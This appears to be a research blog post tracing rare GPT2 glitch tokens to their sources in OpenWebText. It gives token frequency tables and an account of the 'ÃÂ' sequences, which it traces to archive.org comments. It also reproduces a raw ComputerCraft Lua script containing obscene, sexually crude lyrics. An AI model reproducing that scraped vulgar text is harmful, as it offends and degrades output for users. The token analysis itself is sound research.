This is a collection of every unidentified GPT2 glitch token listed in the third glitch token archaeology post. I was able to find the source of every single one, except for "?????-" and "?????-?????-"[1]. Please tell me if I missed one, or if you've discovered one and don't understand where it came from. This isn't meant to be a well-written analysis, just a quick repository of my glitch-hunting observations.

I plan on writing up and categorizing all of these in greater detail in future posts, the first of which is here.

I used OpenWebText, a recreation of GPT2's training data, for all experiments in this post. I tokenized every .gz file in the archive and made a boolean NumPy array marking each token that was present at least once. This allowed me to quickly identify infrequent tokens in the dataset and pull up the textual context with regular expressions. If there was an issue with overlap, I used a tokenizer-based extraction instead. All data and code are available upon request.
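As a rough illustration of the counting step, here is a minimal sketch of how per-token file frequencies could be gathered. It is not the code used for this post: the `tokenize` callable, the toy tokenizer, and the function names are all hypothetical stand-ins, and a `Counter` of sets plays the role of the boolean NumPy array.

```python
from collections import Counter
from typing import Callable, Iterable, List


def file_frequencies(
    documents: Iterable[str],
    tokenize: Callable[[str], List[int]],
) -> Counter:
    """Count, for each token id, how many documents contain it at least once."""
    counts: Counter = Counter()
    for text in documents:
        # A set records presence only, like one row of a boolean array.
        counts.update(set(tokenize(text)))
    return counts


def rarest(counts: Counter, vocab_size: int, n: int) -> list:
    """Return the n (token_id, file_count) pairs with the lowest file counts."""
    pairs = [(tok, counts.get(tok, 0)) for tok in range(vocab_size)]
    return sorted(pairs, key=lambda p: p[1])[:n]


# Hypothetical toy tokenizer: one id per character, vocabulary of 128 ids.
def toy_tokenize(text: str) -> List[int]:
    return [ord(ch) % 128 for ch in text]


docs = ["abc", "abd", "a"]
freq = file_frequencies(docs, toy_tokenize)
print(freq[ord("a")], freq[ord("b")], freq[ord("z")])
```

With a real GPT2 tokenizer in place of `toy_tokenize`, sorting by file count should give a list shaped like the one below.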

The leftmost column is the token id, the middle is the token string, and the right column is the number of files the token was present in (out of 20610). GPT2 has 50257 total tokens.

GPT2 tokens with the lowest frequency in OpenWebText


30898 'embedreportprint' 0
33434 '  士' 0
43453 ' SolidGoldMagikarp' 0
1849 '\xa0' 0
47654 ' \xa0\xa0' 0
50009 ' strutConnector' 0
36173 ' RandomRedditor' 0
214 '\x1a' 0
42424 'DragonMagazine' 0
180 ' ' 0
187 ' ' 0
186 ' ' 0
30213 ' externalToEVAOnly' 0
30212 ' externalToEVA' 0
30211 ' guiIcon' 0
185 ' ' 0
30210 ' guiActiveUnfocused' 0
30209 ' unfocusedRange' 0
184 ' ' 0
30202 ' guiName' 0
183 ' ' 0
30905 'rawdownload' 0
39906 'EStream' 0
33454 '龍喚士' 0
42586 ' srfN' 0
25992 ' 裏覚醒' 0
43065 ' srfAttach' 0
11504 ' \xa0 \xa0' 0
39172 '\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0' 0
40240 'oreAndOnline' 0
40241 'InstoreAndOnline' 0
33477 '\xa0\xa0\xa0' 0
36174 ' RandomRedditorWithNo' 0
37574 'StreamerBot' 0
46600 ' Adinida' 0
182 ' ' 0
29372 ' guiActiveUn' 0
43177 'EStreamFrame' 0
22686 ' \xa0 \xa0 \xa0 \xa0' 0
23282 ' davidjl' 0
47571 ' DevOnline' 0
39752 'quickShip' 0
44320 '\n\xa0' 0
8828 '\xa0\xa0\xa0\xa0' 0
39820 '龍 ' 0
39821 '龍契士' 0
28666 'PsyNetMessage' 0
35207 ' attRot' 0
181 ' ' 0
18472 ' guiActive' 0
179 ' ' 0
17811 '\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0' 0
20174 ' 裏 ' 0
212 '\x18' 0
211 '\x17' 0
210 '\x16' 0
209 '\x15' 0
208 '\x14' 0
31666 '?????-?????-' 0
207 '\x13' 0
206 '\x12' 0
213 '\x19' 0
205 '\x11' 0
203 '\x0f' 0
202 '\x0e' 0
31957 'cffffcc' 0
200 '\x0c' 0
199 '\x0b' 0
197 '\t' 0
196 '\x08' 0
195 '\x07' 0
194 '\x06' 0
193 '\x05' 0
204 '\x10' 0
45545 ' サーティワン' 0
201 '\r' 0
216 '\x1c' 0
37842 ' partName' 0
45706 ' \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0' 0
124 ' ' 0
125 ' ' 0
178 ' ' 0
41380 'natureconservancy' 0
41383 'assetsadobe' 0
177 ' ' 0
215 '\x1b' 0
41551 'Downloadha' 0
4603 '\xa0\xa0' 0
42202 'GoldMagikarp' 0
42089 ' TheNitrome' 0
217 '\x1d' 0
218 '\x1e' 0
42090 ' TheNitromeFan' 0
192 '\x04' 0
191 '\x03' 0
219 '\x1f' 0
189 '\x01' 0
45544 ' サーティ' 0
5624 ' \xa0' 0
190 '\x02' 0
40242 'BuyableInstoreAndOnline' 1
36935 ' dstg' 1
36940 ' istg' 1
45003 ' SetTextColor' 1
30897 'reportprint' 1
39757 'channelAvailability' 1
39756 'inventoryQuantity' 1
39755 'isSpecialOrderable' 1
39811 'soDeliveryDate' 1
39753 'quickShipAvailable' 1
39714 'isSpecial' 1
47198 'ItemTracker' 1
17900 ' Dragonbound' 1
45392 'dayName' 1
37579 'TPPStreamerBot' 1
31573 'ActionCode' 2
25193 'NetMessage' 2
39749 'DeliveryDate' 2
30208 ' externalTo' 2
43569 'ÍÍ' 2
34027 ' actionGroup' 2
34504 ' 裏 ' 2
39446 ' SetFontSize' 2
30899 'cloneembedreportprint' 2
32047 ' "$:/' 3
39803 'soType' 3
39177 'ItemThumbnailImage' 3
49781 'EngineDebug' 3
25658 '?????-' 3
33813 '=~=~' 3
48396 'ÛÛ' 3
34206 '#$#$' 3
36938 ' sqor' 3
40219 'oreAnd' 3
32437 ' Smartstocks' 3
35579 ' Mechdragon' 3
38370 'iHUD' 3
36929 ' sidx' 4
39165 'catentry' 4
12781 'wcsstore' 4
34448 ' ItemLevel' 4
38250 ' Skydragon' 5
39253 ' UCHIJ' 5
174 ' ' 6
36130 ' PsyNet' 6
173 ' ' 6
39655 'Orderable' 6
43361 'ゼウス' 6
39142 'ThumbnailImage' 6
41297 ' TAMADRA' 7
25502 'ItemImage' 7
42066 'Nitrome' 8
27013 'aditional' 8
49731 ' EntityItem' 9
24934 'ForgeModLoader' 9
36862 'EMOTE' 11
31765 'MpServer' 11
48069 '*=-' 11
15243 '¯¯¯¯¯¯¯¯' 11
22757 ' 醒' 12
34473 'ヘラ' 12
23090 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ' 12
31032 'SpaceEngineers' 12
27006 '¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯' 12
50216 ' Leilan' 13
9364 'ÃÂÃÂÃÂÃÂ' 13
39693 'Buyable' 13
40278 '*/(' 13
17629 ' practition' 13
23596 '  ' 14
4690 'ortunately' 14
36926 ' attm' 14
13150 ' subur' 14
19476 ' carbohyd' 14
40236 'FINEST' 14
8980 '¯¯¯¯' 15
176 ' ' 15
14827 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ' 16
24847 'ModLoader' 17
5815 'ÃÂÃÂ' 18
34516 '>>\\' 19
14341 'PDATE' 19
27924 ' srf' 20
6438 ' 裏' 20
23614 '覚醒' 20
47182 '":""},{"' 21
5367 '¯¯' 21
34604 '\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' 22
31783 ' BaseType' 22
30684 ' ⓘ' 22
24973 ' exting' 23
18945 ' teasp' 23
15272 ' pione' 25
47490 '   ' 25
39374 ' 士' 25
48193 '@#&' 25
30439 ' unintention' 25
25618 ' councill' 25
27293 ' antidepress' 26
36473 'luaj' 26
35496 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ' 26
42889 'ikuman' 27
45563 'ⓘ' 27
37631 'FactoryReloaded' 28
27097 '-+-+' 28
37444 ' petertodd' 29
29646 ' gobl' 31
35992 'WithNo' 31
40012 'uyomi' 32
23785 '"]=>' 32
7105 ' volunte' 34
36490 '00200000' 35
12677 ' tradem' 35
10298 'senal' 35
42744 '-+-+-+-+' 37
48366 '◼' 37
13945 '  ' 38
47703 '  極' 39
4060 'vertisement' 40
46939 ';;;;;;;;;;;;' 41

Unfortunately, formatting issues are causing tokens 188-221 to display as corrupted or blank. They are mostly ASCII control characters (\x00 through \x1f, plus \x7f), among other ASCII sequences. I'm not sure how often GPT2 actually saw these tokens.
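For anyone who wants to see which raw byte sits behind each low token id, here is a small sketch. It assumes that ids 0-255 follow the byte ordering used by the `bytes_to_unicode` helper in GPT2's released encoder code (printable bytes first, then everything else). That ordering is an assumption on my part, although it agrees with the entries in the tables here, such as 197 for '\t', 201 for '\r', and 221 for '\x7f'. The names `byte_order` and `ID_TO_BYTE` are made up for this example.

```python
def byte_order() -> list:
    """Bytes in the order assumed for token ids 0-255."""
    printable = (
        list(range(0x21, 0x7F))     # '!' through '~'
        + list(range(0xA1, 0xAD))   # 0xA1 through 0xAC
        + list(range(0xAE, 0x100))  # 0xAE through 0xFF
    )
    # Every remaining byte (control characters, space, 0x7F, ...) comes last.
    rest = [b for b in range(256) if b not in printable]
    return printable + rest


# Assumed mapping from token id to the single byte it represents.
ID_TO_BYTE = dict(enumerate(byte_order()))

for token_id in (124, 188, 197, 201, 220, 221):
    print(token_id, hex(ID_TO_BYTE[token_id]))
```

Under that assumption, ids 188-220 are the bytes \x00 through \x20, and ids like 124, 125 and 173-187 are high bytes (0xC0, 0xC1, 0xF1 through 0xFF) that never or almost never appear in valid UTF-8, which would fit their zero counts.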

Note how much overlap there is with the glitch tokens documented in the 3rd SolidGoldMagikarp investigation post! I've tested many of these low/null-frequency tokens, and most of them indeed behave as glitch tokens.

SolidGoldMagikarp III: Glitch token archaeology — LessWrong

array([['188', '\x00', '20610'],
      ['189', '\x01', '0'],
      ['190', '\x02', '0'],
      ['191', '\x03', '0'],
      ['192', '\x04', '0'],
      ['193', '\x05', '0'],
      ['194', '\x06', '0'],
      ['195', '\x07', '0'],
      ['196', '\x08', '0'],
      ['202', '\x0e', '0'],
      ['203', '\x0f', '0'],
      ['204', '\x10', '0'],
      ['205', '\x11', '0'],
      ['206', '\x12', '0'],
      ['207', '\x13', '0'],
      ['208', '\x14', '0'],
      ['209', '\x15', '0'],
      ['210', '\x16', '0'],
      ['211', '\x17', '0'],
      ['212', '\x18', '0'],
      ['213', '\x19', '0'],
      ['214', '\x1a', '0'],
      ['215', '\x1b', '0'],
      ['221', '\x7f', '478'],
      ['3693', '.[', '20604'],
      ['5815', 'ÃÂÃÂ', '18'],
      ['9364', 'ÃÂÃÂÃÂÃÂ', '13'],
      ['12781', 'wcsstore', '4'],
      ['17405', '\\.', '1783'],
      ['17629', ' practition', '13'],
      ['17900', ' Dragonbound', '1'],
      ['18472', ' guiActive', '0'],
      ['20126', ' \u200b', '9460'],
      ['21807', '\\\\\\\\\\\\\\\\', '45'],
      ['23090', 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ', '12'],
      ['23282', ' davidjl', '0'],
      ['23614', '覚醒', '20'],
      ['23785', '"]=>', '32'],
      ['24200', ' --------', '2027'],
      ['24398', ' \u200e', '2526'],
      ['24440', 'ュ', '1338'],
      ['24934', 'ForgeModLoader', '9'],
      ['25465', '天', '1478'],
      ['25992', ' 裏覚醒', '0'],
      ['28666', 'PsyNetMessage', '0'],
      ['29372', ' guiActiveUn', '0'],
      ['30202', ' guiName', '0'],
      ['30208', ' externalTo', '2'],
      ['30209', ' unfocusedRange', '0'],
      ['30210', ' guiActiveUnfocused', '0'],
      ['30211', ' guiIcon', '0'],
      ['30212', ' externalToEVA', '0'],
      ['30213', ' externalToEVAOnly', '0'],
      ['30897', 'reportprint', '1'],
      ['30898', 'embedreportprint', '0'],
      ['30899', 'cloneembedreportprint', '2'],
      ['30905', 'rawdownload', '0'],
      ['30906', 'rawdownloadcloneembedreportprint', '4398'],
      ['31032', 'SpaceEngineers', '12'],
      ['31576', 'externalActionCode', '62'],
      ['31583', 'к', '5580'],
      ['31666', '?????-?????-', '0'],
      ['31708', 'ーン', '635'],
      ['31727', 'cffff', '156'],
      ['31765', 'MpServer', '11'],
      ['31886', ' gmaxwell', '133'],
      ['31957', 'cffffcc', '0'],
      ['32047', ' "$:/', '3'],
      ['32437', ' Smartstocks', '3'],
      ['32509', '":[{"', '298'],
      ['33454', '龍喚士', '0'],
      ['34713', '":"","', '275'],
      ['35207', ' attRot', '0'],
      ['35384', "''.", '3964'],
      ['35579', ' Mechdragon', '3'],
      ['36130', ' PsyNet', '6'],
      ['36173', ' RandomRedditor', '0'],
      ['36174', ' RandomRedditorWithNo', '0'],
      ['36481', 'ertodd', '125'],
      ['36938', ' sqor', '3'],
      ['36940', ' istg', '1'],
      ['37082', ' "\\', '1479'],
      ['37444', ' petertodd', '29'],
      ['37574', 'StreamerBot', '0'],
      ['37579', 'TPPStreamerBot', '1'],
      ['37631', 'FactoryReloaded', '28'],
      ['37842', ' partName', '0'],
      ['37858', 'ヤ', '547'],
      ['38214', '\\">', '210'],
      ['38250', ' Skydragon', '5'],
      ['38370', 'iHUD', '3'],
      ['39165', 'catentry', '4'],
      ['39177', 'ItemThumbnailImage', '3'],
      ['39253', ' UCHIJ', '5'],
      ['39446', ' SetFontSize', '2'],
      ['39749', 'DeliveryDate', '2'],
      ['39752', 'quickShip', '0'],
      ['39753', 'quickShipAvailable', '1'],
      ['39755', 'isSpecialOrderable', '1'],
      ['39756', 'inventoryQuantity', '1'],
      ['39757', 'channelAvailability', '1'],
      ['39803', 'soType', '3'],
      ['39811', 'soDeliveryDate', '1'],
      ['39821', '龍契士', '0'],
      ['40240', 'oreAndOnline', '0'],
      ['40241', 'InstoreAndOnline', '0'],
      ['40242', 'BuyableInstoreAndOnline', '1'],
      ['41380', 'natureconservancy', '0'],
      ['41383', 'assetsadobe', '0'],
      ['41441', '\\-', '645'],
      ['41551', 'Downloadha', '0'],
      ['42066', 'Nitrome', '8'],
      ['42089', ' TheNitrome', '0'],
      ['42090', ' TheNitromeFan', '0'],
      ['42202', 'GoldMagikarp', '0'],
      ['42424', 'DragonMagazine', '0'],
      ['42470', 'TextColor', '97'],
      ['42586', ' srfN', '0'],
      ['42728', ' largeDownload', '894'],
      ['43065', ' srfAttach', '0'],
      ['43177', 'EStreamFrame', '0'],
      ['43361', 'ゼウス', '6'],
      ['43453', ' SolidGoldMagikarp', '0'],
      ['44686', 'ーティ', '198'],
      ['45544', ' サーティ', '0'],
      ['45545', ' サーティワン', '0'],
      ['46600', ' Adinida', '0'],
      ['47182', '":""},{"', '21'],
      ['47198', 'ItemTracker', '1'],
      ['47571', ' DevOnline', '0'],
      ['48193', '@#&', '25'],
      ['49781', 'EngineDebug', '3'],
      ['50009', ' strutConnector', '0'],
      ['50216', ' Leilan', '13'],
      ['40012', 'uyomi', '32'],
      ['45335', 'aterasu', '487'],
      ['14827', 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ', '16'],
      ['5808', 'ÃÂ', '44'],
      ['48396', 'ÛÛ', '3'],
      ['41297', ' TAMADRA', '7'],
      ['39906', 'EStream', '0']], dtype='<U32')

 

Similarly, most documented glitch tokens also had low occurrence in the dataset. I will remark upon the exceptions later.

 

Glitch Tokens and Where They Came From

48193 @#& 25

Number of occurrences of the token of interest in each file:

[3299, 4, 3, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]

This was present in 25 files, 24 of which contained 1-4 instances of profanity censors ("God f@#&ing damn"). The one exception contained >3000 instances.
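Per-file counts and surrounding context like the above can be pulled out with a few lines of Python. This is only a sketch under simple assumptions: it searches for the token's string form directly rather than running the tokenizer, and the file names and helper names are hypothetical.

```python
import re


def occurrences_per_file(files: dict, needle: str) -> list:
    """Non-overlapping counts of needle per file, largest first, zeros dropped."""
    counts = [text.count(needle) for text in files.values()]
    return sorted((c for c in counts if c > 0), reverse=True)


def contexts(text: str, needle: str, width: int = 20) -> list:
    """Return each match of needle with up to `width` characters on either side."""
    pattern = re.compile(
        rf".{{0,{width}}}{re.escape(needle)}.{{0,{width}}}", re.DOTALL
    )
    return pattern.findall(text)


# Hypothetical miniature corpus.
files = {
    "a.txt": "God f@#&ing damn",
    "b.txt": "x!@#&y!@#&z",
    "c.txt": "nothing here",
}
print(occurrences_per_file(files, "@#&"))
print(contexts(files["a.txt"], "@#&", width=3))
```

Plain string search can overcount when the string is split across different tokens, which is where a tokenizer-based extraction is the safer choice.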

ComputerCraft code

local pkg = { [ "var" ] = { [ "linox.ver" ] = "Linox v0.0.1" , [ "mpc-get-repo.rpo" ] = "I staple tape worms on my penis!@#&So the flesh worm will drink brainjuice from your fetus!@#&(4X)!@#&!@#&Feel the blood gushing from your anus!@#&(2X)!@#&!@#&Feel the blood gushing from your anus!@#&(4X)!@#&!@#&Tape worms on my fucking penis!!@#&Penis!!@#&Tape worms!!@#&Tape worms on my penis!!@#&Tape worms on my penis!@#&Tape worms on my peniiiiiii....!" , } , [ "etc" ] = { [ "linoxim" ] = " !@#& 55555 !@#& 54445 !@#& 54e45 !@#& 54e45 555 !@#& 54e45 !@#& 54e45555555 555 55555555 55555 555 555 !@#& 54e44444445 555 55555555 55555 555 555 !@#& 54eeeeeee45 555 555 555 55 55 5555 !@#& 54444444445 555 555 555 55555 555 555 !@#& 55555555555 555 555 555 55555 555 555 !@#& !@#& !@#& !@#& !@#& !@#& !@#& " , [ "linoxm" ] = " !@#& 55555 !@#& 54445 !@#& 54e45 !@#& 54e45 555 !@#& 54e45 !@#& 54e45555555 555 55555555 55555 555 555 !@#& 54e44444445 555 55555555 55555 555 555 !@#& 54eeeeeee45 555 555 555 55 55 5555 !@#& 54444444445 555 555 555 55555 555 555 !@#& 55555555555 555 555 555 55555 555 555 !@#& !@#& eee eee e e !@#& e e e e e e !@#& e e e e e e e !@#& e e e eeeee e eee !@#& !@#& " , [ "bg" ] = " !@#& 55555 !@#& 54445 !@#& 54e45 !@#& 54e45 555 !@#& 54e45 !@#& 54e45555555 555 55555555 55555 555 555 !@#& 54e44444445 555 55555555 55555 555 555 !@#& 54eeeeeee45 555 555 555 55 55 55555 !@#& 54444444445 555 555 555 55555 555 555 !@#& 55555555555 555 555 555 55555 555 555 !@#& !@#& !@#& !@#& !@#& !@#& !@#& " , [ "mfb" ] = { } , } , [ "startup" ] = "if not os.getComputerLabel() then!@#& os.setComputerLabel( \\" SEXY_BEAST \\" )!@#&end!@#&cua = fs.open( \\" /lib/usr/users \\" , \\" r \\" )!@#&if cua.readAll() == \\" \\" then!@#& cua.close()!@#& sua = fs.open( \\" /lib/usr/users \\" , \\" w \\" )!@#& sua.writeLine(\'{[ \\" admin \\" ]= \\" d74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1 \\" ,}\')!@#& sua.close()!@#&else!@#& cua.close()!@#&end!@#&motd = { \\" Coded by __Hithere 
\\" , \\" http://zudohackz.koding.com \\" , \\" ALIENS \\" , \\" [xx]* -<I\'m a testicle!> \\" , \\" You can only hack my penis on singleplayer! \\" , \\" Internal stack failure, system halted? \\" , \\" Kernel Panic! \\" , \\" Warning: Logging in will make you a nerd


()!@#&!@#& if e == \\" char \\" then!@#& local s = false!@#& if properties.textLength and line:len() < properties.textLength then s = true!@#& elseif not properties.textLength then s = true end!@#&!@#& local canType = true!@#& if not properties.grantPrint and properties.refusePrint then!@#& local canTypeKeys = {}!@#& if type(properties.refusePrint) == \\" table \\" then!@#& for _, v in pairs(properties.refusePrint) do!@#& table.insert(canTypeKeys, tostring(v):sub(1, 1))!@#& end!@#& elseif type(properties.refusePrint) == \\" string \\" then!@#& for char in properties.refusePrint:gmatch( \\" . \\" ) do!@#& table.insert(canTypeKeys, char)!@#& end!@#& end!@#& for _, v in pairs(canTypeKeys) do if but == v then canType = false end end!@#& elseif properties.grantPrint then!@#& canType = false!@#& local canTypeKeys = {}!@#& if type(properties.grantPrint) == \\" table \\" then!@#& for _, v in pairs(properties.grantPrint) do!@#& table.insert(canTypeKeys, tostring(v):sub(1, 1))!@#& end!@#& elseif type(properties.grantPrint) == \\" string \\" then!@#& for char in properties.grantPrint:gmatch( \\" . \\" ) do!@#& table.insert(canTypeKeys, char)!@#& end!@#& end!@#& for _, v in pairs(canTypeKeys) do if but == v then canType = true end end!@#& end!@#&!@#& if s and canType then!@#& line = line:sub(1, pos) .. but .. 
line:sub(pos + 1, -1)!@#& pos = pos + 1!@#& redraw()!@#& end!@#& elseif e == \\" key \\" then!@#& if but == keys.enter then break!@#& elseif but == keys.left then if pos > 0 then pos = pos - 1 redraw() end!@#& elseif but == keys.right then if pos < line:len() then pos = pos + 1 redraw() end!@#& elseif (but == keys.up or but == keys.down) and properties.history then!@#& redraw( \\" \\" )!@#& if but == keys.up then!@#& if historyPos == nil and #properties.history > 0 then !@#& historyPos = #properties.history!@#& elseif historyPos > 1 then !@#& historyPos = historyPos - 1!@#& end!@#& elseif but == keys.down then!@#& if historyPos == #properties.history then historyPos = nil!@#& elseif historyPos ~= nil then historyPos = historyPos + 1 end!@#& end!@#&!@#& if properties.history and historyPos then!@#& line = properties.history[historyPos]!@#& pos = line:len()!@#& else!@#& line = \\" \\" !@#& pos = 0!@#& end!@#&!@#& redraw()!@#& local a = sendLiveUpdates( \\" history \\" )!@#& if a then return a end!@#& elseif but == keys.backspace and pos > 0 then!@#& redraw( \\" \\" )!@#& line = line:sub(1, pos - 1) .. line:sub(pos + 1, -1)!@#& pos = pos - 1!@#& redraw()!@#& local a = sendLiveUpdates( \\" delete \\" )!@#& if a then return a end!@#& elseif but == keys.home then!@#& pos = 0!@#& redraw()!@#& elseif but == keys.delete and pos < line:len() then!@#& redraw( \\" \\" )!@#& line = line:sub(1, pos) .. 
line:sub(pos + 2, -1)!@#& redraw()!@#& local a = sendLiveUpdates( \\" delete \\" )!@#& if a then return a end!@#& elseif but == keys[ \\" end \\" ] then!@#& pos = line:len()!@#& redraw()!@#& elseif properties.exitOnKey then !@#& if but == properties.exitOnKey or (properties.exitOnKey == \\" control \\" and !@#& (but == 29 or but == 157)) then !@#& term.setCursorBlink(false)!@#& return nil!@#& end!@#& end!@#& end!@#& local a = sendLiveUpdates(e, but, x, y, p4, p5)!@#& if a then return a end!@#& end!@#&!@#& term.setCursorBlink(false)!@#& if line ~= nil then line = line:gsub( \\" ^%s*(.-)%s*$ \\" , \\" %1 \\" ) end!@#& return line!@#&end!@#&!@#&!@#&-- -------- Themes!@#&!@#&local defaultTheme = {!@#& background = \\" gray \\" ,!@#& backgroundHighlight = \\" lightGray \\" ,!@#& prompt = \\" cyan \\" ,!@#& promptHighlight = \\" lightBlue \\" ,!@#& err = \\" red \\" ,!@#& errHighlight = \\" pink \\" ,!@#&!@#& editorBackground = \\" gray \\" ,!@#& editorLineHightlight = \\" lightBlue \\" ,!@#& editorLineNumbers = \\" gray \\" ,!@#& editorLineNumbersHighlight = \\" lightGray \\" ,!@#& editorError = \\" pink \\" ,!@#& editorErrorHighlight = \\" red \\" ,!@#&!@#& textColor = \\" white \\" ,!@#& conditional = \\" yellow \\" ,!@#& constant = \\" orange \\"', ' nil then historyPos = historyPos + 1 end!@#& end!@#&!@#& if properties.history and historyPos then!@#& line = properties.history[historyPos]!@#& pos = line:len()!@#& else!@#& line = \\" \\" !@#& pos = 0!@#& end!@#&!@#& redraw()!@#& local a = sendLiveUpdates( \\" history \\" )!@#& if a then return a end!@#& elseif but == keys.backspace and pos > 0 then!@#& redraw( \\" \\" )!@#& line = line:sub(1, pos - 1) .. line:sub(pos + 1, -1)!@#& pos = pos - 1!@#& redraw()!@#& local a = sendLiveUpdates( \\" delete \\" )!@#& if a then return a end!@#& elseif but == keys.home then!@#& pos = 0!@#& redraw()!@#& elseif but == keys.delete and pos < line:len() then!@#& redraw( \\" \\" )!@#& line = line:sub(1, pos) .. 
line:sub(pos + 2, -1)!@#& redraw()!@#& local a = sendLiveUpdates( \\" delete \\" )!@#& if a then return a end!@#& elseif but == keys[ \\" end \\" ] then!@#& pos = line:len()!@#& redraw()!@#& elseif properties.exitOnKey then !@#& if but == properties.exitOnKey or (properties.exitOnKey == \\" control \\" and !@#& (but == 29 or but == 157)) then !@#& term.setCursorBlink(false)!@#& return nil!@#& end!@#& end!@#& end!@#& local a = sendLiveUpdates(e, but, x, y, p4, p5)!@#& if a then return a end!@#& end!@#&!@#& term.setCursorBlink(false)!@#& if line ~= nil then line = line:gsub( \\" ^%s*(.-)%s*$ \\" , \\" %1 \\" ) end!@#& return line!@#&end!@#&!@#&!@#&-- -------- Themes!@#&!@#&local defaultTheme = {!@#& background = \\" gray \\" ,!@#& backgroundHighlight = \\" lightGray \\" ,!@#& prompt = \\" cyan \\" ,!@#& promptHighlight = \\" lightBlue \\" ,!@#& err = \\" red \\" ,!@#& errHighlight = \\" pink \\" ,!@#&!@#& editorBackground = \\" gray \\" ,!@#& editorLineHightlight = \\" lightBlue \\" ,!@#& editorLineNumbers = \\" gray \\" ,!@#& editorLineNumbersHighlight = \\" lightGray \\" ,!@#& editorError = \\" pink \\" ,!@#& editorErrorHighlight = \\" red \\" ,!@#&!@#& textColor = \\" white \\" ,!@#& conditional = \\" yellow \\" ,!@#& constant = \\" orange \\" ,!@#& [ \\" function \\" ] = \\" magenta \\" ,!@#& string = \\" red \\" ,!@#& comment = \\" lime \\" !@#&}!@#&!@#&local normalTheme = {!@#& background = \\" black \\" ,!@#& backgroundHighlight = \\" black \\" ,!@#& prompt = \\" black \\" ,!@#& promptHighlight = \\" black \\" ,!@#& err = \\" black \\" ,!@#& errHighlight = \\" black \\" ,!@#&!@#& editorBackground = \\" black \\" ,!@#& editorLineHightlight = \\" black \\" ,!@#& editorLineNumbers = \\" black \\" ,!@#& editorLineNumbersHighlight = \\" white \\" ,!@#& editorError = \\" black \\" ,!@#& editorErrorHighlight = \\" black \\" ,!@#&!@#& textColor = \\" white \\" ,!@#& conditional = \\" white \\" ,!@#& constant = \\" white \\" ,!@#& [ \\" function \\" ] = \\" white \\" 
,!@#& string = \\" white \\" ,!@#& comment = \\" white \\" !@#&}!@#&!@#&local availableThemes = {!@#& { \\" Water (Default) \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/default.txt \\" },!@#& { \\" Fire \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/fire.txt \\" },!@#& { \\" Sublime Text 2 \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/st2.txt \\" },!@#& { \\" Midnight \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/midnight.txt \\" },!@#& { \\" TheOriginalBIT \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/bit.txt \\" },!@#& { \\" Superaxander \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/superaxander.txt \\" },!@#& { \\" Forest \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/forest.txt \\" },!@#& { \\" Night \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/night.txt \\" 

 

Other users helped me identify it as being part of a script for ComputerCraft, a Minecraft mod.

 

 

35496 ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ 26
 

[1184, 1127, 1126, 1041, 1035, 966, 825, 768, 518, 224, 128, 128, 96, 84, 68, 32, 30, 28, 22, 16, 8, 4, 4, 2, 2, 2] (sum=9468) (these are non-overlapping instances)

There are tokens for repeating "ÃÂ" sequences of length 1, 2, 4, 8, 16, 32, and 64. Others pointed out that this was a common formatting issue with online text. But why were sequences of length 64 so common as to get tokenized?
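The power-of-two lengths are what a byte-pair-encoding style merge procedure tends to produce on a long uniform run: the most frequent adjacent pair is always two copies of the current longest piece, so each merge doubles it. Here is a toy sketch of that effect. It is a simplification, not GPT2's actual tokenizer training (which works on bytes across the whole corpus), and `merge_once` is a made-up helper.

```python
from collections import Counter

UNIT = "\u00c3\u00c2"  # the two-character sequence "ÃÂ"


def merge_once(symbols: list):
    """Merge the most frequent adjacent pair everywhere it occurs, left to right."""
    pairs = Counter(zip(symbols, symbols[1:]))
    if not pairs:
        return symbols, None
    (a, b), _ = pairs.most_common(1)[0]
    merged, i = [], 0
    while i < len(symbols):
        if i + 1 < len(symbols) and symbols[i] == a and symbols[i + 1] == b:
            merged.append(a + b)
            i += 2
        else:
            merged.append(symbols[i])
            i += 1
    return merged, a + b


symbols = [UNIT] * 64  # one long run, pre-split into 64 base units
learned = []
for _ in range(6):
    symbols, new_token = merge_once(symbols)
    learned.append(new_token)

# Length of each learned token, measured in base units.
lengths = [len(tok) // len(UNIT) for tok in learned]
print(lengths)
```

In this toy setting the long tokens only get learned because the run is long and uninterrupted, which matches the question of why such long sequences were common enough in the data.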

It's literally because of one website, archive.org. 

https://archive.org/details/AlessandroMoreschi

It seems that archive.org has a few old comments that have massive chunks of such text. 600,000+ total A's, in fact, across dozens of pages. Although similar text exists on other sites, there was far less of it, and archive.org was also the only source of length 16+ A tokens in the dataset, meaning it was likely the sole reason those tokens were ever present in the final tokenizer.

That said, I did see this post before my investigation, but guessed that something would have interrupted the sequence before it got to perfect sequences of thousands of letters. Obviously I was wrong.

In any case, ÃÂ sequences were rare enough that none (not even "ÃÂ"!) were included in the tokenizers for GPT3.5/GPT4 or GPT4o.

 

31727 cffff 156
 

